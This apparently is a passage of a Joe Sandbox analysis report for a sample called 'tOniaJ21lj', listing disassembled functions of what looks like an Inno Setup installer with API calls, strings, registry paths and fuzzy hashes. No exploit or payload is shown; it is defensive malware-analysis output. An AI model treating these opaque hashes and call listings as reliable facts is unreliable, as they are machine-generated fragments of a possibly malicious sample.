                                                                                      • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ExitMessageProcess
                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                      • API String ID: 1220098344-2970929446
                                                                                      • Opcode ID: 8c8c0f2434a4a7f5450b7d1f87c82a5e4d49965682bc3ad0c70a84493f0d02f9
                                                                                      • Instruction ID: 7ca15834b35bf0f9f7e67f0c6f6a322a9a8b6c98d325c36795369cb21074e1e4
                                                                                      • Opcode Fuzzy Hash: 8c8c0f2434a4a7f5450b7d1f87c82a5e4d49965682bc3ad0c70a84493f0d02f9
                                                                                      • Instruction Fuzzy Hash: 9221B360A442418ADB11E7B9ECC1B163F919BE5348F06817BE700B73E6C67C884587AE
                                                                                      APIs
                                                                                        • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                      • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455068
                                                                                      • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455095
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                      • String ID: LoadTypeLib$RegisterTypeLib
                                                                                      • API String ID: 1312246647-2435364021
                                                                                      • Opcode ID: 10250a5388d3ee4e550ba31a3fe5ac1922547201747451197e41336d70963160
                                                                                      • Instruction ID: a0afcb3eee2e7d482a942a29ca59f5276f9681079562e2f4f26ed5ddc6a25d5d
                                                                                      • Opcode Fuzzy Hash: 10250a5388d3ee4e550ba31a3fe5ac1922547201747451197e41336d70963160
                                                                                      • Instruction Fuzzy Hash: B3119A30B00A04BFDB11DFA6DD61A5EBBBDDB49B05B108476FD00D3692DA399D04C654
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004912FB
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Window
                                                                                      • String ID: (PI$/INITPROCWND=$%x $@
                                                                                      • API String ID: 2353593579-723503215
                                                                                      • Opcode ID: 86e6223bfffcafd1a2f65b692b323bd489f5f98954c4b0d8703fa7141f283f5b
                                                                                      • Instruction ID: 1f11efd2ee19ddf28ed764c7ee5ed9f3dfbff071989b61bae05a2d8f1a94ab96
                                                                                      • Opcode Fuzzy Hash: 86e6223bfffcafd1a2f65b692b323bd489f5f98954c4b0d8703fa7141f283f5b
                                                                                      • Instruction Fuzzy Hash: 4611C071A082099FDB01EBA5D841BAEBFB8EB48304F50447BE804E7692D6789904CB58
                                                                                      APIs
                                                                                        • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      • GetFocus.USER32 ref: 00473BBF
                                                                                      • GetKeyState.USER32(0000007A), ref: 00473BD1
                                                                                      • WaitMessage.USER32(?,00000000,00473BF8,?,00000000,00473C1F,?,?,00000001,00000000,?,?,?,?,0047AFF7,00000000), ref: 00473BDB
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FocusMessageStateTextWaitWindow
                                                                                      • String ID: Wnd=$%x
                                                                                      • API String ID: 1381870634-2927251529
                                                                                      • Opcode ID: 148b3ddb7fb618247b6546acefc5128578639e1ec72ed586d201cbdf9417bc3e
                                                                                      • Instruction ID: 9b2db89c6fe012053fe9ee9db841d35393315fe18e075f30de14d411f09ec015
                                                                                      • Opcode Fuzzy Hash: 148b3ddb7fb618247b6546acefc5128578639e1ec72ed586d201cbdf9417bc3e
                                                                                      • Instruction Fuzzy Hash: A111A371604205AFC701FF65CC42ADEBBB8EB49704B51C4BAF408E7681D738AF00AA69
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045540D
                                                                                      • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045549F
                                                                                      Strings
                                                                                      • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00455439
                                                                                      • 4II, xrefs: 00455454
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: 4II$Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)
                                                                                      • API String ID: 3850602802-2462613993
                                                                                      • Opcode ID: 21981b69b3b60292a9e34021e10eefbd607064df05416549cbbf09db8aab2aab
                                                                                      • Instruction ID: b78d32421564deef5ec6d5e0726a4814eb3dcf40a391e8832c227d70dedd3d0b
                                                                                      • Opcode Fuzzy Hash: 21981b69b3b60292a9e34021e10eefbd607064df05416549cbbf09db8aab2aab
                                                                                      • Instruction Fuzzy Hash: 7411E5B1204240AFD700AB29AC81B6F7A9C9791309F05403FF9859F393D3794804C76A
                                                                                      APIs
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046A540
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046A54F
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Time$File$LocalSystem
                                                                                      • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                      • API String ID: 1748579591-1013271723
                                                                                      • Opcode ID: 77c66de3cf485688cd8a454c74e7d13fa64a864e7151765c05c799678a767d6c
                                                                                      • Instruction ID: 3d329a02b99cf0ad1c2443f5a734abd9e2d9e95f88f8d85801cc299a54af140a
                                                                                      • Opcode Fuzzy Hash: 77c66de3cf485688cd8a454c74e7d13fa64a864e7151765c05c799678a767d6c
                                                                                      • Instruction Fuzzy Hash: 6111F8A040C3919ED340DF2AC44432BBAE4AB89704F04892FF9D8D6381E779C948DBB7
                                                                                      APIs
                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00452A67
                                                                                        • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00496628,00492DAD,00000000,00492E02,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00452A8C
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: File$AttributesDeleteErrorLastMove
                                                                                      • String ID: DeleteFile$MoveFile
                                                                                      • API String ID: 3024442154-139070271
                                                                                      • Opcode ID: cba485c4373cb9b3476474b8e686bddda4e38f58d72cb5e4c066a25f76e66c5c
                                                                                      • Instruction ID: f8b9d45963fbba9a2c353dd22a61e6c6557ef6b5226e77028bb226458c331aba
                                                                                      • Opcode Fuzzy Hash: cba485c4373cb9b3476474b8e686bddda4e38f58d72cb5e4c066a25f76e66c5c
                                                                                      • Instruction Fuzzy Hash: 32F036757141055BE704FFA6DA5266F63ECEF4530AFA0443BB800B76C3EA7C9E094929
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047E371
                                                                                      • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047E394
                                                                                      Strings
                                                                                      • CSDVersion, xrefs: 0047E368
                                                                                      • System\CurrentControlSet\Control\Windows, xrefs: 0047E33E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                      • API String ID: 3677997916-1910633163
                                                                                      • Opcode ID: 0901654d9ab6cc44d6c913291a9ded88af89d372fc2709b86358ce193460f02c
                                                                                      • Instruction ID: 8efd12000c89c59f245f9e1a1bb94511b09fbcc5fab7c17f0dd19fd863842872
                                                                                      • Opcode Fuzzy Hash: 0901654d9ab6cc44d6c913291a9ded88af89d372fc2709b86358ce193460f02c
                                                                                      • Instruction Fuzzy Hash: EFF03675A40209E6DF10D6E28C45BDF77BCAB08708F1086A7EE14E7280E7789A44CB59
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00457C5A,00000000,00457DA7,?,00000000,00000000,00000000), ref: 00457B75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                      • API String ID: 47109696-2631785700
                                                                                      • Opcode ID: 23cb1f2033dc3865c53e7f2342fb28a5b001a15c0a0e235066296095a06ac94b
                                                                                      • Instruction ID: d0e0819fb55c8f1190b2a98828cf62c2b63c39478ea79f7c0b5f5cfc857af762
                                                                                      • Opcode Fuzzy Hash: 23cb1f2033dc3865c53e7f2342fb28a5b001a15c0a0e235066296095a06ac94b
                                                                                      • Instruction Fuzzy Hash: 0DF0AF317041205BC710EB1AF851B4A6689DB9131AF54403BF980D7256D77DEC0A875A
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00452762,00000000,00452805,?,?,00000000,00000000,00000000,00000000,00000000,?,00452AD1,00000000), ref: 0042D7E6
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D7EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                      • API String ID: 1646373207-4063490227
                                                                                      • Opcode ID: 159a61d3abceb67132d836cbc908e23cdc840a77e135d0af2cc19f2b4bcaaff8
                                                                                      • Instruction ID: 4db8f333c9a0d948aa4d288d669557f69a64c6eaa67e0ad6c3f7b03414b73d9c
                                                                                      • Opcode Fuzzy Hash: 159a61d3abceb67132d836cbc908e23cdc840a77e135d0af2cc19f2b4bcaaff8
                                                                                      • Instruction Fuzzy Hash: 23E04F61B44B1112D7107ABA9C83A5B10898B88724FA0843B79A5E72C7EDBCD94A1A7D
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E7F8), ref: 0042E88A
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E890
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                      • API String ID: 1646373207-260599015
                                                                                      • Opcode ID: 45ddc528c20c35e0718a7e9c00f94a1c84d7b78ddc924b0a461653c56359e4f8
                                                                                      • Instruction ID: 93babc8de609d28a759936f35cc35ab5444e0eee9e0897fa3c7a0f5d424eaefa
                                                                                      • Opcode Fuzzy Hash: 45ddc528c20c35e0718a7e9c00f94a1c84d7b78ddc924b0a461653c56359e4f8
                                                                                      • Instruction Fuzzy Hash: 5FD0C992352B726A6A1075FB3CD19EB02CCCE517B53A40077F684E7342EAADCC0535AD
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00493215), ref: 0044F1B3
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F1B9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: NotifyWinEvent$user32.dll
                                                                                      • API String ID: 1646373207-597752486
                                                                                      • Opcode ID: 1b77f3625f350db58ab3348097a305bf1d639b9e1269e079a5da3a737ffde695
                                                                                      • Instruction ID: 84f0676aae26238d79669219dc5dd421ce8b9c86ef8cbad31698c6a02a110ee9
                                                                                      • Opcode Fuzzy Hash: 1b77f3625f350db58ab3348097a305bf1d639b9e1269e079a5da3a737ffde695
                                                                                      • Instruction Fuzzy Hash: 25E012E0A01740DDEB10FBB5D942B0B3EA0EB5475DB01017BB4006619AC77C4C088B1D
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00493266,00000001,00000000,0049328A), ref: 00492FEA
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00492FF0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                      • API String ID: 1646373207-834958232
                                                                                      • Opcode ID: 7dd0ed140dce1b1c3cfbac4273f952859e09270a56939a23c95a62daeb5fa57b
                                                                                      • Instruction ID: 931628e3c560cbc195009d45a592bfebd759f3ec05311ed7f501d7576358ba43
                                                                                      • Opcode Fuzzy Hash: 7dd0ed140dce1b1c3cfbac4273f952859e09270a56939a23c95a62daeb5fa57b
                                                                                      • Instruction Fuzzy Hash: A1B09281281701A08C1076F20E42E5B0C18584072571400373400B10CBCEACCA00382D
                                                                                      APIs
                                                                                        • Part of subcall function 0044B08C: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F1A9,00493215), ref: 0044B0B3
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B0CB
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B0DD
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B0EF
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B101
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B113
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B125
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B137
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B149
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B15B
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B16D
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B17F
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B191
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B1A3
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B1B5
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B1C7
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B1D9
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B1EB
                                                                                      • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00493238), ref: 00460EBB
                                                                                      • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460EC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                      • API String ID: 2238633743-2683653824
                                                                                      • Opcode ID: 93fe2c06cf711e01664fd138f27f9ab14834f9042b92f4705049898ce8c901dd
                                                                                      • Instruction ID: c6d074b57e85807914eec84ee8616fe1a8135e5451870e443c9658575dc96a53
                                                                                      • Opcode Fuzzy Hash: 93fe2c06cf711e01664fd138f27f9ab14834f9042b92f4705049898ce8c901dd
                                                                                      • Instruction Fuzzy Hash: 4EB092D0A51B11E48E10B7B39C4390B1814C544B0E710493BB0607A083EB7E40044E6E
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 00413CB6
                                                                                      • GetDesktopWindow.USER32 ref: 00413D6E
                                                                                        • Part of subcall function 00418E30: 6F5BC6F0.COMCTL32(?,00000000,00413F33,00000000,00414043,?,?,00496628), ref: 00418E4C
                                                                                        • Part of subcall function 00418E30: ShowCursor.USER32(00000001,?,00000000,00413F33,00000000,00414043,?,?,00496628), ref: 00418E69
                                                                                      • SetCursor.USER32(00000000,?,?,?,?,00413A63,00000000,00413A76), ref: 00413DAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CursorDesktopWindow$Show
                                                                                      • String ID:
                                                                                      • API String ID: 2074268717-0
                                                                                      • Opcode ID: 86f28fd5b8e67e4ed68fb8d3243ff4e40f6b005c19925ef4854e6769390e0e23
                                                                                      • Instruction ID: 370eb430aafb64f03e0c00a45e78fc31171da0b863367db60babd08861f95fe9
                                                                                      • Opcode Fuzzy Hash: 86f28fd5b8e67e4ed68fb8d3243ff4e40f6b005c19925ef4854e6769390e0e23
                                                                                      • Instruction Fuzzy Hash: 5C412A75600150AFCB10EF29F988B9677E1AB65325B17847FE404DB369DA38EC81CF58
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 004089DD
                                                                                      • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408A4C
                                                                                      • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408AE7
                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408B26
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$FileMessageModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 704749118-0
                                                                                      • Opcode ID: 3ad30de8adde06992adcb1243033629fda3c93d42ee346dc6366a67b7f75c718
                                                                                      • Instruction ID: d4d784650a0269eb12294142f4e6c1e51b8c8d651a7e98bb559ca79e8df8d1d5
                                                                                      • Opcode Fuzzy Hash: 3ad30de8adde06992adcb1243033629fda3c93d42ee346dc6366a67b7f75c718
                                                                                      • Instruction Fuzzy Hash: 8F3141706083809FD730EB65C945B9B77E89B86304F40483FB6C8EB2D1DB7999098B67
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E341
                                                                                        • Part of subcall function 0044C984: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C9B6
                                                                                      • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E3C5
                                                                                        • Part of subcall function 0042BB24: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BB38
                                                                                      • IsRectEmpty.USER32(?), ref: 0044E387
                                                                                      • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E3AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                      • String ID:
                                                                                      • API String ID: 855768636-0
                                                                                      • Opcode ID: 3f1c9d4db00e826481b178ab64ea00970205f687122e4d4c1c485c0144d2d05a
                                                                                      • Instruction ID: f1327bf96be57b41a4daac13efecf4e5f8c8315b345326dd3a19bc45d13401f9
                                                                                      • Opcode Fuzzy Hash: 3f1c9d4db00e826481b178ab64ea00970205f687122e4d4c1c485c0144d2d05a
                                                                                      • Instruction Fuzzy Hash: 55115E72B0030027E210BA7E8C86B6B76C99B89748F04083FB646EB383DE7DDC054399
                                                                                      APIs
                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00490134
                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 0049014F
                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00490169
                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 00490184
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: OffsetRect
                                                                                      • String ID:
                                                                                      • API String ID: 177026234-0
                                                                                      • Opcode ID: d3f66989ff800960b4c0a82a6ffd76303d58a919d7c08028faeb7088e89b5ea7
                                                                                      • Instruction ID: 0e3da5e30cc057e3d74a4c16cf1607cb24db427b0c3e95cd5a18fc3dad4c20bc
                                                                                      • Opcode Fuzzy Hash: d3f66989ff800960b4c0a82a6ffd76303d58a919d7c08028faeb7088e89b5ea7
                                                                                      • Instruction Fuzzy Hash: 52217CB6700201AFD700DE69CC85E6BB7EEEBC4300F14CA2AF694C7249D635ED448796
                                                                                      APIs
                                                                                      • GetCursorPos.USER32 ref: 004171D0
                                                                                      • SetCursor.USER32(00000000), ref: 00417213
                                                                                      • GetLastActivePopup.USER32(?), ref: 0041723D
                                                                                      • GetForegroundWindow.USER32(?), ref: 00417244
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                      • String ID:
